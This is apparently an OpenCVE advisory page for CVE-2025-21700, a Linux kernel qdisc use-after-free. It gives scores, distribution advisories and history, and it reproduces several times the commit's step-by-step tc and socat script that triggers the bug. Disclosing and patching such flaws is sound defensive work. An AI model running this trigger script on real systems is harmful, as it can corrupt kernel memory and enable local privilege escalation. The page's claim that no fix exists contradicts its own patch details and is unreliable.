Description
In the Linux kernel, the following vulnerability has been resolved:

net: sched: Disallow replacing of child qdisc from one parent to another

Lion Ackermann was able to create a UAF which can be abused for privilege
escalation with the following script

Step 1. create root qdisc
tc qdisc add dev lo root handle 1:0 drr

step2. a class for packet aggregation do demonstrate uaf
tc class add dev lo classid 1:1 drr

step3. a class for nesting
tc class add dev lo classid 1:2 drr

step4. a class to graft qdisc to
tc class add dev lo classid 1:3 drr

step5.
tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024

step6.
tc qdisc add dev lo parent 1:2 handle 3:0 drr

step7.
tc class add dev lo classid 3:1 drr

step 8.
tc qdisc add dev lo parent 3:1 handle 4:0 pfifo

step 9. Display the class/qdisc layout

tc class ls dev lo
class drr 1:1 root leaf 2: quantum 64Kb
class drr 1:2 root leaf 3: quantum 64Kb
class drr 3:1 root leaf 4: quantum 64Kb

tc qdisc ls
qdisc drr 1: dev lo root refcnt 2
qdisc plug 2: dev lo parent 1:1
qdisc pfifo 4: dev lo parent 3:1 limit 1000p
qdisc drr 3: dev lo parent 1:2

step10. trigger the bug <=== prevented by this patch
tc qdisc replace dev lo parent 1:3 handle 4:0

step 11. Redisplay again the qdiscs/classes

tc class ls dev lo
class drr 1:1 root leaf 2: quantum 64Kb
class drr 1:2 root leaf 3: quantum 64Kb
class drr 1:3 root leaf 4: quantum 64Kb
class drr 3:1 root leaf 4: quantum 64Kb

tc qdisc ls
qdisc drr 1: dev lo root refcnt 2
qdisc plug 2: dev lo parent 1:1
qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p
qdisc drr 3: dev lo parent 1:2

Observe that a) parent for 4:0 does not change despite the replace request.
There can only be one parent. b) refcount has gone up by two for 4:0 and
c) both class 1:3 and 3:1 are pointing to it.

Step 12. send one packet to plug
echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))
step13. send one packet to the grafted fifo
echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10003))

step14. lets trigger the uaf
tc class delete dev lo classid 1:3
tc class delete dev lo classid 1:1

The semantics of "replace" is for a del/add _on the same node_ and not
a delete from one node(3:1) and add to another node (1:3) as in step10.
While we could "fix" with a more complex approach there could be
consequences to expectations so the patch takes the preventive approach of
"disallow such config".

Joint work with Lion Ackermann <nnamrec@gmail.com>
Published: 2025-02-13
Score: 7.8 High
EPSS: < 1% Very Low
KEV: No
Impact: Privilege Escalation
Action: Patch Immediately
AI Analysis

Impact

The vulnerability is a use‑after‑free in the Linux kernel networking scheduler that allows an attacker to replace a child queuing discipline (qdisc) from one parent to another. This manipulation can leave dangling references and cause memory corruption that, if triggered, may lead to arbitrary code execution or privilege escalation. The core weakness is a classic use‑after‑free (CWE‑416).

Affected Systems

This issue affects the Linux kernel in all current releases prior to the patch that disables the replace operation between different parents. The vulnerability is documented in the kernel commit tree and affects all distribution kernels that have not incorporated the change, including Debian LTS releases mentioned in the advisory mailing list.

Risk and Exploitability

The CVSS score of 7.8 indicates high severity, while the EPSS score of <1% shows that exploitation is unlikely or unobserved. KEV does not list this vulnerability, implying no known widespread exploitation. Attackers would need to execute the tc commands that manipulate qdiscs, which generally requires CAP_NET_ADMIN or root privileges, so the vector is local privilege escalation rather than remote exploitation.

Generated by OpenCVE AI on April 28, 2026 at 03:40 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the Linux kernel to a version that includes the commit disabling qdisc replace between parents.
  • If an immediate upgrade is not possible, restrict tc usage by removing CAP_NET_ADMIN capability from untrusted processes or applying appropriate SELinux/AppArmor profiles.
  • Verify that older kernels are not running on critical hosts, and re‑image or replace them with the patched kernel.

Generated by OpenCVE AI on April 28, 2026 at 03:40 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Debian DLA Debian DLA DLA-4102-1 linux-6.1 security update
Debian DLA Debian DLA DLA-4178-1 linux security update
EUVD EUVD EUVD-2025-2649 In the Linux kernel, the following vulnerability has been resolved: net: sched: Disallow replacing of child qdisc from one parent to another Lion Ackermann was able to create a UAF which can be abused for privilege escalation with the following script Step 1. create root qdisc tc qdisc add dev lo root handle 1:0 drr step2. a class for packet aggregation do demonstrate uaf tc class add dev lo classid 1:1 drr step3. a class for nesting tc class add dev lo classid 1:2 drr step4. a class to graft qdisc to tc class add dev lo classid 1:3 drr step5. tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024 step6. tc qdisc add dev lo parent 1:2 handle 3:0 drr step7. tc class add dev lo classid 3:1 drr step 8. tc qdisc add dev lo parent 3:1 handle 4:0 pfifo step 9. Display the class/qdisc layout tc class ls dev lo class drr 1:1 root leaf 2: quantum 64Kb class drr 1:2 root leaf 3: quantum 64Kb class drr 3:1 root leaf 4: quantum 64Kb tc qdisc ls qdisc drr 1: dev lo root refcnt 2 qdisc plug 2: dev lo parent 1:1 qdisc pfifo 4: dev lo parent 3:1 limit 1000p qdisc drr 3: dev lo parent 1:2 step10. trigger the bug <=== prevented by this patch tc qdisc replace dev lo parent 1:3 handle 4:0 step 11. Redisplay again the qdiscs/classes tc class ls dev lo class drr 1:1 root leaf 2: quantum 64Kb class drr 1:2 root leaf 3: quantum 64Kb class drr 1:3 root leaf 4: quantum 64Kb class drr 3:1 root leaf 4: quantum 64Kb tc qdisc ls qdisc drr 1: dev lo root refcnt 2 qdisc plug 2: dev lo parent 1:1 qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p qdisc drr 3: dev lo parent 1:2 Observe that a) parent for 4:0 does not change despite the replace request. There can only be one parent. b) refcount has gone up by two for 4:0 and c) both class 1:3 and 3:1 are pointing to it. Step 12. send one packet to plug echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001)) step13. send one packet to the grafted fifo echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10003)) step14. lets trigger the uaf tc class delete dev lo classid 1:3 tc class delete dev lo classid 1:1 The semantics of "replace" is for a del/add _on the same node_ and not a delete from one node(3:1) and add to another node (1:3) as in step10. While we could "fix" with a more complex approach there could be consequences to expectations so the patch takes the preventive approach of "disallow such config". Joint work with Lion Ackermann <nnamrec@gmail.com>
Ubuntu USN Ubuntu USN USN-7428-1 Linux kernel vulnerabilities
Ubuntu USN Ubuntu USN USN-7428-2 Linux kernel (FIPS) vulnerabilities
Ubuntu USN Ubuntu USN USN-7429-1 Linux kernel vulnerabilities
Ubuntu USN Ubuntu USN USN-7429-2 Linux kernel (FIPS) vulnerabilities
Ubuntu USN Ubuntu USN USN-7445-1 Linux kernel vulnerabilities
Ubuntu USN Ubuntu USN USN-7448-1 Linux kernel vulnerabilities
Ubuntu USN Ubuntu USN USN-7449-1 Linux kernel vulnerabilities
Ubuntu USN Ubuntu USN USN-7449-2 Linux kernel (HWE) vulnerabilities
Ubuntu USN Ubuntu USN USN-7450-1 Linux kernel vulnerabilities
Ubuntu USN Ubuntu USN USN-7451-1 Linux kernel vulnerabilities
Ubuntu USN Ubuntu USN USN-7452-1 Linux kernel vulnerabilities
Ubuntu USN Ubuntu USN USN-7453-1 Linux kernel (Real-time) vulnerabilities
Ubuntu USN Ubuntu USN USN-7455-1 Linux kernel vulnerabilities
Ubuntu USN Ubuntu USN USN-7455-2 Linux kernel (FIPS) vulnerabilities
Ubuntu USN Ubuntu USN USN-7455-3 Linux kernel (Real-time) vulnerabilities
Ubuntu USN Ubuntu USN USN-7455-4 Linux kernel (Oracle) vulnerabilities
Ubuntu USN Ubuntu USN USN-7455-5 Linux kernel (AWS) vulnerabilities
Ubuntu USN Ubuntu USN USN-7459-1 Linux kernel (Intel IoTG) vulnerabilities
Ubuntu USN Ubuntu USN USN-7459-2 Linux kernel (GCP) vulnerabilities
Ubuntu USN Ubuntu USN USN-7460-1 Linux kernel (Azure FIPS) vulnerabilities
Ubuntu USN Ubuntu USN USN-7461-1 Linux kernel vulnerabilities
Ubuntu USN Ubuntu USN USN-7461-2 Linux kernel (FIPS) vulnerabilities
Ubuntu USN Ubuntu USN USN-7461-3 Linux kernel (Xilinx ZynqMP) vulnerabilities
Ubuntu USN Ubuntu USN USN-7462-1 Linux kernel vulnerabilities
Ubuntu USN Ubuntu USN USN-7462-2 Linux kernel (AWS FIPS) vulnerabilities
Ubuntu USN Ubuntu USN USN-7463-1 Linux kernel (IBM) vulnerabilities
Ubuntu USN Ubuntu USN USN-7468-1 Linux kernel (Azure, N-Series) vulnerabilities
Ubuntu USN Ubuntu USN USN-7475-1 Linux kernel (Xilinx ZynqMP) vulnerabilities
Ubuntu USN Ubuntu USN USN-7523-1 Linux kernel (Raspberry Pi Real-time) vulnerabilities
Ubuntu USN Ubuntu USN USN-7524-1 Linux kernel (Raspberry Pi) vulnerabilities
Ubuntu USN Ubuntu USN USN-7539-1 Linux kernel (Raspberry Pi) vulnerabilities
Ubuntu USN Ubuntu USN USN-7540-1 Linux kernel (Raspberry Pi) vulnerabilities
History

Mon, 03 Nov 2025 20:30:00 +0000

Type Values Removed Values Added
References

Wed, 16 Jul 2025 13:45:00 +0000

Type Values Removed Values Added
Metrics epss

{'score': 0.0002}

 epss

{'score': 0.00023}

Sun, 13 Jul 2025 13:45:00 +0000

Type Values Removed Values Added
Metrics epss

{'score': 0.00018}

 epss

{'score': 0.0002}

Sat, 12 Jul 2025 13:45:00 +0000

Type Values Removed Values Added
Metrics epss

{'score': 0.0003}

 epss

{'score': 0.00018}

Mon, 24 Mar 2025 18:00:00 +0000

Type Values Removed Values Added
First Time appeared Linux
Linux linux Kernel
CPEs cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*
Vendors & Products Linux
Linux linux Kernel

Thu, 13 Mar 2025 12:30:00 +0000

Type Values Removed Values Added
References

Fri, 21 Feb 2025 14:00:00 +0000

Type Values Removed Values Added
References

Thu, 20 Feb 2025 02:45:00 +0000

Type Values Removed Values Added
Metrics threat_severity

Important

 threat_severity

Moderate

Fri, 14 Feb 2025 02:00:00 +0000

Type Values Removed Values Added
References
Metrics threat_severity

None

 threat_severity

Important

Thu, 13 Feb 2025 14:15:00 +0000

Type Values Removed Values Added
Weaknesses CWE-416
Metrics cvssV3_1

{'score': 7.8, 'vector': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}

ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Thu, 13 Feb 2025 11:45:00 +0000

Type Values Removed Values Added
Description In the Linux kernel, the following vulnerability has been resolved: net: sched: Disallow replacing of child qdisc from one parent to another Lion Ackermann was able to create a UAF which can be abused for privilege escalation with the following script Step 1. create root qdisc tc qdisc add dev lo root handle 1:0 drr step2. a class for packet aggregation do demonstrate uaf tc class add dev lo classid 1:1 drr step3. a class for nesting tc class add dev lo classid 1:2 drr step4. a class to graft qdisc to tc class add dev lo classid 1:3 drr step5. tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024 step6. tc qdisc add dev lo parent 1:2 handle 3:0 drr step7. tc class add dev lo classid 3:1 drr step 8. tc qdisc add dev lo parent 3:1 handle 4:0 pfifo step 9. Display the class/qdisc layout tc class ls dev lo class drr 1:1 root leaf 2: quantum 64Kb class drr 1:2 root leaf 3: quantum 64Kb class drr 3:1 root leaf 4: quantum 64Kb tc qdisc ls qdisc drr 1: dev lo root refcnt 2 qdisc plug 2: dev lo parent 1:1 qdisc pfifo 4: dev lo parent 3:1 limit 1000p qdisc drr 3: dev lo parent 1:2 step10. trigger the bug <=== prevented by this patch tc qdisc replace dev lo parent 1:3 handle 4:0 step 11. Redisplay again the qdiscs/classes tc class ls dev lo class drr 1:1 root leaf 2: quantum 64Kb class drr 1:2 root leaf 3: quantum 64Kb class drr 1:3 root leaf 4: quantum 64Kb class drr 3:1 root leaf 4: quantum 64Kb tc qdisc ls qdisc drr 1: dev lo root refcnt 2 qdisc plug 2: dev lo parent 1:1 qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p qdisc drr 3: dev lo parent 1:2 Observe that a) parent for 4:0 does not change despite the replace request. There can only be one parent. b) refcount has gone up by two for 4:0 and c) both class 1:3 and 3:1 are pointing to it. Step 12. send one packet to plug echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001)) step13. send one packet to the grafted fifo echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10003)) step14. lets trigger the uaf tc class delete dev lo classid 1:3 tc class delete dev lo classid 1:1 The semantics of "replace" is for a del/add _on the same node_ and not a delete from one node(3:1) and add to another node (1:3) as in step10. While we could "fix" with a more complex approach there could be consequences to expectations so the patch takes the preventive approach of "disallow such config". Joint work with Lion Ackermann <nnamrec@gmail.com>
Title net: sched: Disallow replacing of child qdisc from one parent to another
References

Subscriptions

Linux Linux Kernel
cve-icon MITRE

Status: PUBLISHED

Assigner: Linux

Published:

Updated: 2026-04-02T08:39:22.831Z

Reserved: 2024-12-29T08:45:45.748Z

Link: CVE-2025-21700

cve-icon Vulnrichment

Updated: 2025-11-03T19:35:46.524Z

cve-icon NVD

Status : Modified

Published: 2025-02-13T12:15:27.837

Modified: 2025-11-03T20:17:09.340

Link: CVE-2025-21700

cve-icon Redhat

Severity : Moderate

Publid Date: 2025-02-13T00:00:00Z

Links: CVE-2025-21700 - Bugzilla

cve-icon OpenCVE Enrichment

Updated: 2026-04-28T03:45:20Z

Weaknesses